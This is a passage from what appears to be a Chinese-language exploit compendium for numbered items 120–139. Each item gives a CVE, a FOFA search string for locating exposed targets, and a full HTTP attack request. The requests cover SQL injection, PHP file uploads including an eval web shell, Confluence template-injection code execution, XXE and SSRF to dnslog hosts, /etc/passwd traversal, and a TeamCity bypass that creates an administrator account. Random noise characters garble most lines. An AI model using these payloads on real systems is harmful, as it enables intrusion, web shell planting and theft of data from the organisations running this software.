+ \: N I* e( J6 r9 `- X0 w) V+ ^X-Remote-Ip: 1.1.1.11 ^+ P% @& A. P# Y# @5 z
X-Remote-Addr: 1.1.1.1 g% v5 m6 \6 i% _
Te: trailers
8 W2 r$ U3 \/ r6 I; tConnection: close3 u9 t/ m/ E. M/ P
1 x% H0 r9 ^$ i5 z) ]. l3 x
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
7 c8 a$ @- l1 D: n! X1 {2 Y# S L: m4 t& ?1 a) t0 t8 M
/ y6 q, T- Q" a0 }& A6 m" T) R120. 北京百绰智能S40管理平台导入web.php任意文件上传8 R6 ]2 R+ P, Q% R+ ^
CVE-2024-12536 I0 G& ]6 \# r
FOFA:title="Smart管理平台"% S. o( \" m ]' g1 o
POST /useratte/web.php? HTTP/1.1
$ d) r* F. |, j' yHost: ip:port' r; B* k9 ~" @! X. P) a2 Y
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
% l" n, W: R9 I! sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko7 ?6 d, e: Y: ]% o+ `/ |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" [8 S; x9 X, w5 m' o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" b H2 F- N/ Y8 b
Accept-Encoding: gzip, deflate5 y; f+ J; e. k" @% u3 B
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328% {% f# t$ A, K# m: [
Content-Length: 597; h1 V) J7 g% G8 W8 S3 N7 e
Origin: https://ip:port
& O1 v. k9 ^0 O$ N( U) Z3 mReferer: https://ip:port/sysmanage/licence.php
9 H- v9 Q' d( e: c; @Upgrade-Insecure-Requests: 1
4 e$ L1 g3 m. c! A! w7 a% BSec-Fetch-Dest: document
: D `9 T4 y8 y3 E. `Sec-Fetch-Mode: navigate6 |' G# h N' E' E
Sec-Fetch-Site: same-origin$ L& A3 U% e3 G+ B1 n% i
Sec-Fetch-User: ?1- t& |# `7 O& v: r' W: b
Te: trailers
; v6 M6 G4 J; d; J% g* n% [5 tConnection: close
3 ~/ u/ Z% H1 X6 r0 d
# M4 J6 U( T) I3 t-----------------------------42328904123665875270630079328
( G# c! }3 N" V2 B6 V- r8 f; VContent-Disposition: form-data; name="file_upload"; filename="2.php"
- r0 f1 Z4 Y/ N. ~' r4 Q7 b# gContent-Type: application/octet-stream" W+ y. V. e4 y1 T% E
* k6 i! }" G; g( W2 S3 j<?php phpinfo()?>$ N* A& `0 ~) ^7 M
-----------------------------42328904123665875270630079328
& @, ]; I+ y8 a$ y: k/ [ |/ DContent-Disposition: form-data; name="id_type"1 |0 b# l! N1 H) C- d) a) l
! S: O: a6 Q1 _ ^+ Q" S) t
1
$ f" V) c+ K; I7 e' Q4 I( e! K-----------------------------42328904123665875270630079328) b! O% \7 [ D- p5 [; Y& V
Content-Disposition: form-data; name="1_ck". A: B5 H$ `7 `2 |; w! ?
# Z2 f& w& i5 R+ x2 Q% H1_radhttp3 m* k% Q/ p4 `# ~1 ~7 i
-----------------------------423289041236658752706300793288 T4 u6 ]! w P, b$ j) [! M& A
Content-Disposition: form-data; name="mode"
* B9 t2 a3 M: j7 [# a& _- D7 ^' V, y% j- X' H5 T
import& J. }# {$ `( O2 n+ N: V1 B% P7 x
-----------------------------42328904123665875270630079328
: \/ k0 \; E/ n5 }/ b8 e" f( l5 R& M' z* Y5 q B- i$ f8 `8 q
8 L( {/ [9 \+ a1 J1 G文件路径/upload/2.php
7 X1 S6 p; I) ^7 m# H, Y7 p1 |4 V* O, X. k8 ~4 H4 g) ^
121. 北京百绰智能S42管理平台userattestation.php任意文件上传. D2 n0 i7 P% F, l. I+ ]
CVE-2024-1918
+ H' ]3 C4 I! bFOFA:title="Smart管理平台"" W2 d8 O( y/ v! J# C2 U! c; X
POST /useratte/userattestation.php HTTP/1.1/ p d- L W, D6 v5 E S8 D. X
Host: 192.168.40.130:8443
^$ E5 p5 d$ dCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
9 }: f3 _" U5 T# j. k; E) `9 _( OUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
9 q0 \7 V. ~ o& X8 j2 k* `4 a* xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. D& B# w) ]) g+ T0 a% JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! j3 o: U0 r* `Accept-Encoding: gzip, deflate
% o/ \+ z6 A3 VContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328# @$ y# |9 |, k& ^# W9 x$ }
Content-Length: 592' w4 x6 v- g) {5 G7 ? z9 f5 H K' v
Origin: https://192.168.40.130:8443) O7 o* a* U: | k0 `# b* P( H
Upgrade-Insecure-Requests: 1: A. i+ I! y( E9 M- h
Sec-Fetch-Dest: document
- u! c B% O, x% u; C8 f; bSec-Fetch-Mode: navigate
9 I2 o* n. ?2 P, O# HSec-Fetch-Site: same-origin" j8 x9 z8 y6 p/ u
Sec-Fetch-User: ?1
% ]2 C8 B& V, @$ t3 d MTe: trailers
! Y+ |6 Q$ k% lConnection: close, H6 i2 ^. D3 o' c6 X' v9 V
, c1 ~9 ~5 q) d) e-----------------------------42328904123665875270630079328
2 X" C# a I- p1 {' aContent-Disposition: form-data; name="web_img"; filename="1.php"
, e2 _+ b" H7 k6 pContent-Type: application/octet-stream' a0 y. K7 R3 T& H% e* v4 U3 u( V& {
; G N0 ^5 a* w
<?php phpinfo();?># s' x3 M# D1 \) E F8 C
-----------------------------42328904123665875270630079328! {5 v% K/ o% F" q4 G z
Content-Disposition: form-data; name="id_type"8 o. A8 K5 I4 a$ C2 ^
' w2 A- z% w4 ?* \0 q/ \5 l) V
1
5 d J8 p# _/ h2 F4 d# n& K-----------------------------42328904123665875270630079328' L' Q6 z2 i' u2 H% Y5 U" e
Content-Disposition: form-data; name="1_ck"/ X, M- t" M3 A7 z! P
# O: C. W4 p" g* b- x1_radhttp0 `# M4 o; {, M9 I
-----------------------------42328904123665875270630079328, h/ P Y P: \8 n8 G
Content-Disposition: form-data; name="hidwel"
' i$ H0 a" i4 _) }/ ^% b; Y! P* V G9 S. i6 ^
set; x( y U, x$ Q3 T- T' W
-----------------------------42328904123665875270630079328
+ h/ g7 b# F- \8 ^
7 O2 `# J0 ~' W7 x% |0 J9 `6 x1 c) v$ b9 A T
boot/web/upload/weblogo/1.php# L. r7 @7 N! R. I/ P% R. R
9 ]6 }& z+ i1 e$ ^( R
122. 北京百绰智能s200管理平台/importexport.php sql注入) H8 T" s# i$ `% Y% b! H
CVE-2024-27718FOFA:title="Smart管理平台"
7 ^2 C0 m3 L. Z7 m其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version(), F+ i" O7 A! Q
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.10 C; J! X: J4 x; ~ y$ k
Host: x.x.x.x; R# D2 C, \- Y% M2 j4 k" {
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
3 } h5 k: o, N" X3 R5 J6 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 C: ?$ @/ }6 e8 t3 m( f7 ?6 d1 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! u6 ~! }( g. J! zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ {& \! M8 P" ] n+ M
Accept-Encoding: gzip, deflate, br
; E% l1 V/ P4 }Upgrade-Insecure-Requests: 1
& E m' y1 a' DSec-Fetch-Dest: document4 q( J' X% s. Z9 F- ^( J& L
Sec-Fetch-Mode: navigate4 }/ b4 U& i; e, a6 E( l8 X
Sec-Fetch-Site: none
0 l0 M# |1 R' x2 a$ P) \Sec-Fetch-User: ?1' m) ~ i( c I5 W# x" Y( B
Te: trailers( `4 y* h: r: Z
Connection: close, Z8 f/ l! ~2 Z4 Q% x
: J, k. x* `4 {- [) o3 S$ q) Z
( _5 [. ^8 U7 H+ u/ u123. Atlassian Confluence 模板注入代码执行
/ l: q+ Z3 K% M4 {! s2 b2 {FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3", k) Z0 c, u7 z& V# V
POST /template/aui/text-inline.vm HTTP/1.1
' u" x1 Z# E% @; |" @. r9 u1 NHost: localhost:8090
: k1 Q/ B+ Y6 N% p/ T% B6 gAccept-Encoding: gzip, deflate, br
* d1 V: e; f( D8 iAccept: */*
8 c2 j, I# |/ A, g1 MAccept-Language: en-US;q=0.9,en;q=0.86 w. [4 u! D7 v) @) T* o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36; V$ l4 L. ]3 _/ h: O, o& W
Connection: close
j# v- ]3 K. ]$ n5 V! XContent-Type: application/x-www-form-urlencoded
, h0 t& O) F. [0 Y) b5 h8 O/ ]6 t+ |9 _- y) N
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
H" I) |3 }, h8 r
0 F$ m8 D! O5 Z9 B ^: j1 _ \- E) W
124. 湖南建研工程质量检测系统任意文件上传
* |& ~ e, t) A( L! h8 O( i9 F, C' } yFOFA:body="/Content/Theme/Standard/webSite/login.css"6 }) y2 O) [$ H# }
POST /Scripts/admintool?type=updatefile HTTP/1.1) w ]4 S4 [3 Z2 p) u* L( X
Host: 192.168.40.130:8282
3 v8 A$ D, [; ~' X, {& EUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.367 A/ N% l9 X5 O1 y$ [1 Q
Content-Length: 72
; d* I' j' Z9 h- t; nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.86 m8 q& t8 ~$ J7 t5 b8 J
Accept-Encoding: gzip, deflate, br. h0 E# J: j7 D* \1 T. O0 C J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ F2 l3 d) z6 S! d- ^Connection: close8 K6 R7 H. v' p d2 K v
Content-Type: application/x-www-form-urlencoded9 b' d) n6 T9 a: U" s5 Y9 m' `
1 s1 d- M" P2 efilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
7 ?: V, ~4 f) b* @
# B2 D* c6 D9 w" @. f2 f4 e0 W, A U
. {# `$ D, z; ~! yhttp://192.168.40.130:8282/Scripts/abcgcg.aspx& k0 z9 ~4 j6 Z* d9 A8 k. k
% {! U( ^: a5 M; \% [ _$ v125. ConnectWise ScreenConnect身份验证绕过7 ]& F% o v" v8 E* L/ j
CVE-2024-1709
r+ P7 d E1 J8 k$ E! [. n. dFOFA:icon_hash="-82958153"
% f% w& ~# s+ p# w2 u, `4 Q+ M dhttps://github.com/watchtowrlabs ... bypass-add-user-poc6 h+ k* v, \. L: t$ @+ H% J) b8 Q) ~
4 H" M- k2 y& `" n+ i) t/ p! v7 W) v+ t7 L/ {- F
使用方法
, C- r; a1 O- b) P6 `python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!( S& Z& s4 N" X; T
7 P! ^' q7 Z( n
4 g: L0 _+ I( _& Z
创建好用户后直接登录后台,可以执行系统命令。
& K% P, @4 d# T0 ~8 u. K/ f6 j6 e% P
+ m5 ?+ h# B2 K& V* v1 e126. Aiohttp 路径遍历. g# m/ k" d3 U* U& F
FOFA:title=="ComfyUI"
6 e0 a$ e K- b$ T/ ]$ w( `; YGET /static/../../../../../etc/passwd HTTP/1.1
1 C/ ]. }# C7 ?Host: x.x.x.x- f$ P5 h& ]8 z0 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 @/ X, f6 C- @9 \: S
Connection: close
7 E) |: T; M' N- ] XAccept: */*) w0 M( ?' k- O/ ^/ S
Accept-Language: en
8 Q: m, \% v6 k0 V! pAccept-Encoding: gzip
/ U/ J7 {2 a, u$ K2 k" q# K/ b: S/ D- Z/ | \. F
T6 \; c7 W/ w: @127. 广联达Linkworks DataExchange.ashx XXE
0 u; }9 X3 Q+ F/ j# kFOFA:body="Services/Identification/login.ashx"
- _7 `1 u5 R$ T2 ? g; KPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1$ Y5 u* A0 n& r/ ?
Host: 192.168.40.130:88880 J3 n2 b& E+ B! B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
! i* a! S# p; W2 q* k/ J; @: d. FContent-Length: 415
6 ?+ H& o# }' |. fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 L1 G2 p7 F! `: \& R9 X) ]Accept-Encoding: gzip, deflate' q o$ Q# o0 \: M: r# S" `9 [
Accept-Language: zh-CN,zh;q=0.9
9 ~8 R3 c; |+ i1 |, tConnection: close
2 ^) R; Z4 t$ s1 o7 \Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0" c6 \1 ^, j. u5 m" `6 w- Q
Purpose: prefetch6 b" B! j! `/ [( ?
Sec-Purpose: prefetch;prerender' r0 s: D% P. w
# ?, ~% N" k% S: W
------WebKitFormBoundaryJGgV5l5ta05yAIe0
7 Z# |9 ]. G0 Q& ?Content-Disposition: form-data;name="SystemName"
. J$ L8 s, Y* [4 p: O' c
3 [ T, [9 x5 Y* @" p: Z0 i% pBIM; C, _4 T1 W+ z7 H- x$ O: e
------WebKitFormBoundaryJGgV5l5ta05yAIe0
) L2 c( u' d# r4 H* o7 UContent-Disposition: form-data;name="Params"
+ m0 R2 s/ Q7 Q0 W* MContent-Type: text/plain7 }' b7 U3 F! Z# H; p% K0 P
" R6 \4 L# n8 a( b$ A. f- c+ o<?xml version="1.0" encoding="UTF-8"?>
4 r8 f. v, ?0 c<!DOCTYPE test [8 g2 D# n+ J! D. k0 X) _
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">+ S, ?& m3 h: Q$ j* R
]
" y4 w+ h3 W' a>
6 u$ Y: k& l: T$ Z6 F! S<test>&t;</test>
7 [! f8 U; L" e5 H) \) k------WebKitFormBoundaryJGgV5l5ta05yAIe0--
( M! x9 h4 Z' \) Q) b0 o' _' ~* w/ B" |
- |8 q3 x# ~! n3 h5 r8 N* f( T4 x- V6 i# X$ }, w, d
128. Adobe ColdFusion 反序列化/ g c8 R# P4 U, b+ L
CVE-2023-38203
1 q8 q2 g; \0 s+ l# f* b' @Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
# ?9 y8 b1 A$ G0 ^7 V' y6 H/ `; l ~& MFOFA:app="Adobe-ColdFusion"
3 N0 |7 d$ H; H4 cPAYLOAD0 n J. d3 @. n. m: ^, Y. Q
, B! W% h) L. d q! ?% Y
129. Adobe ColdFusion 任意文件读取) ~; ^% q2 N, g7 K: g. m W
CVE-2024-207671 G3 D# K2 g# s) e
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"( i T) g# {0 M- D% I/ r
第一步,获取uuid
: D' |. z4 E' D+ ~8 {# iGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1& B# n6 C$ P6 _9 D
Host: x.x.x.x
. Z b# {8 I5 r$ E0 k; g4 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 J% A6 k8 O4 ^Accept: */*+ j0 {& |9 B, W$ @
Accept-Encoding: gzip, deflate
4 {4 m9 z$ p, Z/ h% YConnection: close9 r# t ~, A( d6 l9 t
. N% v, `( Q8 q9 e! @$ A L( P
0 b. D- ^1 w* \9 K9 L4 x第二步,读取/etc/passwd文件' P3 ^5 n3 i0 q) n- Z8 S- a' T
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1) g6 j! g( w* v+ x' N* j8 K
Host: x.x.x.x. k- ~% z7 z+ Z9 s2 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 O, \3 L; S5 v/ ^: EAccept: */*
( n8 O* s6 }2 [- j$ y% ? tAccept-Encoding: gzip, deflate: t+ a( n2 \' x [/ G: A2 M
Connection: close4 {- b$ s6 j" q( a: Y
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
" C7 a: ~4 ]' y7 q* n0 D. L, d4 U* X( [' |- Z
; O' W' c2 o/ F" a. s ?130. Laykefu客服系统任意文件上传
5 b: x2 Q7 K g$ k9 bFOFA:icon_hash="-334624619"8 O: [ Q* Q) o
POST /admin/users/upavatar.html HTTP/1.12 y, K* N0 D1 v% v+ ?* Q
Host: 127.0.0.1
2 n0 Y. v0 L& Z" n9 d% t6 P6 NAccept: application/json, text/javascript, */*; q=0.01& o f- k3 w% m9 ~: g
X-Requested-With: XMLHttpRequest
& P( U: ?' p# M4 cUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
/ x. W& g; n( y A3 F4 x' v5 b: d1 CContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
1 a( e4 _2 J* b+ w: \. b5 T9 P6 pAccept-Encoding: gzip, deflate5 z" D- m( k. D
Accept-Language: zh-CN,zh;q=0.9
+ Y) ]) g* k& ]% ~6 ACookie: user_name=1; user_id=3. H" h: A7 l$ [& J/ p# K
Connection: close4 N/ @" [5 R* x6 c) A" L
3 Q/ y1 \2 l4 i: \------WebKitFormBoundary3OCVBiwBVsNuB2kR
; y, q4 G0 q6 oContent-Disposition: form-data; name="file"; filename="1.php"1 ` k0 P2 ]- J; u7 \ W/ Z0 t
Content-Type: image/png) D" s3 a' }& d/ o
/ \2 {. F8 n: F! G
<?php phpinfo();@eval($_POST['sec']);?>
* h& v: n. q' B2 e, }2 b( B7 n------WebKitFormBoundary3OCVBiwBVsNuB2kR--
$ y5 {: a7 M; U: Y ]3 X E9 s1 H
% x3 d t, f' m8 q131. Mini-Tmall <=20231017 SQL注入
$ p0 P! B4 }3 q7 W- @7 d/ jFOFA:icon_hash="-2087517259"
! W$ ^7 G1 j# Z后台地址:http://localhost:8080/tmall/admin. S Y6 \9 Y; n# }
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)8 I' ^- K$ a8 n- f, A
6 ~. v; x* S- f# y2 X5 T$ ]( K+ \
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
, _8 L; |- f9 g' \- WCVE-2024-271983 ]0 }: L3 B% O$ ^
FOFA:body="Log in to TeamCity"' z6 C6 X( j0 I; u9 X
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
7 a/ I1 O6 F" a& y4 ~1 GHost: 192.168.40.130:8111" e0 P. W2 _. l% N6 \4 R4 {' [0 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Q7 C* m( u/ G2 N. f* k
Accept: */*
/ ~+ ^8 M1 g {/ f" I6 DContent-Type: application/json
4 i, I' G+ l& @Accept-Encoding: gzip, deflate
l, L0 L0 C: q/ Q: ?# Z/ {' D4 J+ m# {! T6 g5 `4 @
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
" z# Y( \0 x2 M' q# Q- E6 n: S( x$ v q# u& |+ O3 w( J
+ V; U: ?4 q6 O2 y) k
CVE-2024-27199
) m# @5 m [: a6 V" J5 d/res/../admin/diagnostic.jsp. O( t7 k8 m- Q7 \' o( f
/.well-known/acme-challenge/../../admin/diagnostic.jsp
# K8 U3 }# q" h3 i4 z/ t Q/update/../admin/diagnostic.jsp
/ J$ u' Q( v$ }9 h+ O! l9 p* i
Z7 d, q. y3 R, }8 T4 u/ J
C) c4 H! {2 t" h8 QCVE-2024-27198-RCE.py7 z! y1 x# E' J& p3 n& e( p$ u
% O7 O; H+ I, [; w# H133. H5 云商城 file.php 文件上传
" x/ a' o+ |; h* YFOFA:body="/public/qbsp.php": N! V k5 e% S) j) @3 x' S
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1/ G; v( X4 c1 ^' _
Host: your-ip
/ _3 X# x' _2 B! C! iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 o* }+ w+ F2 ~2 f" SContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx6 I! _/ h8 o( n3 s8 l
7 C6 m* ~7 [' |# v* p0 O
------WebKitFormBoundaryFQqYtrIWb8iBxUCx- P( d8 l9 w. ]8 H, ^1 H0 L' v
Content-Disposition: form-data; name="file"; filename="rce.php"1 C7 V0 y8 X0 _' P' A5 m* y
Content-Type: application/octet-stream
/ u( ~& ]2 ~( p
* D7 Z5 o0 z2 a& ]+ l5 o<?php system("cat /etc/passwd");unlink(__FILE__);?># W7 V5 [1 T3 x
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--# v% I8 n! M* v" w( |0 E
5 A3 ?! |0 G5 I- t+ V2 C0 |/ i P( @" ^0 W P
$ A1 @+ I. `% L/ R% p& s134. 网康NS-ASG应用安全网关index.php sql注入1 |9 z e" x4 q
CVE-2024-23308 I0 {+ Y+ T6 A, u* T( H7 U% D# t
Netentsec NS-ASG Application Security Gateway 6.3版本
3 J! h3 n8 m6 F0 g; N2 uFOFA:app="网康科技-NS-ASG安全网关"7 v2 F' f- E; @6 P0 P0 B' m
POST /protocol/index.php HTTP/1.1
( r4 V( k, I. V E- Y+ _, pHost: x.x.x.x
7 v. [5 ]% Y" a$ A" a; v# ACookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de" l( P2 R, p! _( w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.02 X( S& [9 X# A7 u: V! Y
Accept: */*8 D. Y! g x( W( D3 Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) y$ Y/ I4 y; u+ _, `3 f; f* a3 a. f. xAccept-Encoding: gzip, deflate
) t# x: D- J9 J9 c& h% \Sec-Fetch-Dest: empty
' J$ x: v5 [8 {Sec-Fetch-Mode: cors0 Q6 p" e/ w9 {4 y7 l
Sec-Fetch-Site: same-origin
2 x% [* c0 E2 iTe: trailers' G: Q$ S o6 S! U* }) F
Connection: close! M, M+ u+ _+ h6 m; R
Content-Type: application/x-www-form-urlencoded! \; b0 r5 H5 Q, N7 H4 S
Content-Length: 263* B! y9 Z5 h" s* K& ?! w
1 M; _0 H) }% y* W. X/ D
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}3 Y1 i# h( k9 v2 \5 M
' V, I, a' K2 _9 p; L" B* K5 Y! P+ m6 N* S
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
; K& Z6 X) k8 YCVE-2024-2022
+ f5 k1 @4 L- _% M3 z; P( uNetentsec NS-ASG Application Security Gateway 6.3版本0 e+ R% f# V$ r) Q+ i9 q+ e
FOFA:app="网康科技-NS-ASG安全网关": u3 @# n, @5 T6 l: b7 t& V
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
' {, b! _4 t+ }6 G6 ^# N8 ^7 [Host: x.x.x.x
( f. s5 y* Q2 M) J. UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 ` v1 \: c$ C) D* M3 p* q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 ]! e7 r$ Q, U7 |# U: k. G2 @' VAccept-Encoding: gzip, deflate
. ?& u& J) h0 lAccept-Language: zh-CN,zh;q=0.9, G, o2 x# q+ C% E
Connection: close
$ B5 k! [3 L& P) Z( N
7 @" H2 l" c; d! T6 ^: j- K6 [3 C. Y9 h, V
136. NextChat cors SSRF
( f& H2 |9 a$ CCVE-2023-49785% A' |" X2 h0 o/ c k
FOFA:title="NextChat"
' `: v$ I! l# Z0 k# g9 O/ nGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
" d1 b' E! P, n, SHost: x.x.x.x:10000' j3 l/ b7 q! _) O' n8 X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% D4 P3 H# @ }Connection: close
# h! r' j; ?* a% l: t; J; NAccept: */*
) j! j! i0 |5 @Accept-Language: en
8 U& T7 x- @" O$ g2 kAccept-Encoding: gzip+ ]$ b6 Y* T2 J' E2 @
+ B/ C, x: J0 p7 n& L7 }$ b
1 d+ G: Z# ~/ Q+ q- K g' i) g/ k3 c137. 福建科立迅通信指挥调度平台down_file.php sql注入- l; c) ^% Q! S( u. ]
CVE-2024-2620( [1 c6 e7 k- j$ m- U4 W) I
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 }& r9 Q) h5 v) R" X' X1 d
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
+ c% N8 l9 e2 T8 ZHost: x.x.x.x! q1 Y* d# e- S3 h7 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: l, r% y4 w5 I/ fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 K6 [6 d9 I' _) n% f( s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' h+ e" V( T+ k
Accept-Encoding: gzip, deflate, br' n- G, t% I; U7 H/ D* b$ m
Connection: close
+ v/ Y5 s( V: ]9 p# @( k& ?$ bCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
' ]$ e; k' P, g" h+ \Upgrade-Insecure-Requests: 1
8 o% D* p8 a) O( d+ s* Q& m! x, Q' D3 X1 n; H
' f& B* N% Q. V5 [138. 福建科立讯通信指挥调度平台pwd_update.php sql注入$ X# i0 o5 ]9 s
CVE-2024-2621
7 B3 q/ y% k( Y5 p* pFOFA:body="app/structure/departments.php" || app="指挥调度管理平台") P3 O3 x, v. X+ @/ _
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
% q. E" }* `- V& u, `( y; c0 _Host: x.x.x.x
% a) D4 z4 d! [- \# IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 V2 ?/ }0 r W- v: q' x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! y; m d; m/ N, ]- ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, b0 {/ j& K3 r' _6 {
Accept-Encoding: gzip, deflate, br
; @( ?/ ]# O6 B, w9 a+ y FConnection: close
) V8 a1 p; S ]4 ~Upgrade-Insecure-Requests: 1
) y z# |0 W+ s. H' Y+ h7 L- m- D1 w$ S& |- u8 H
! E7 L" a# W j& v& o
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
3 K8 s$ A w5 t4 x4 Q/ o5 l0 a9 mCVE-2024-2622 r) T$ x/ m/ K5 U1 j$ t7 o
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
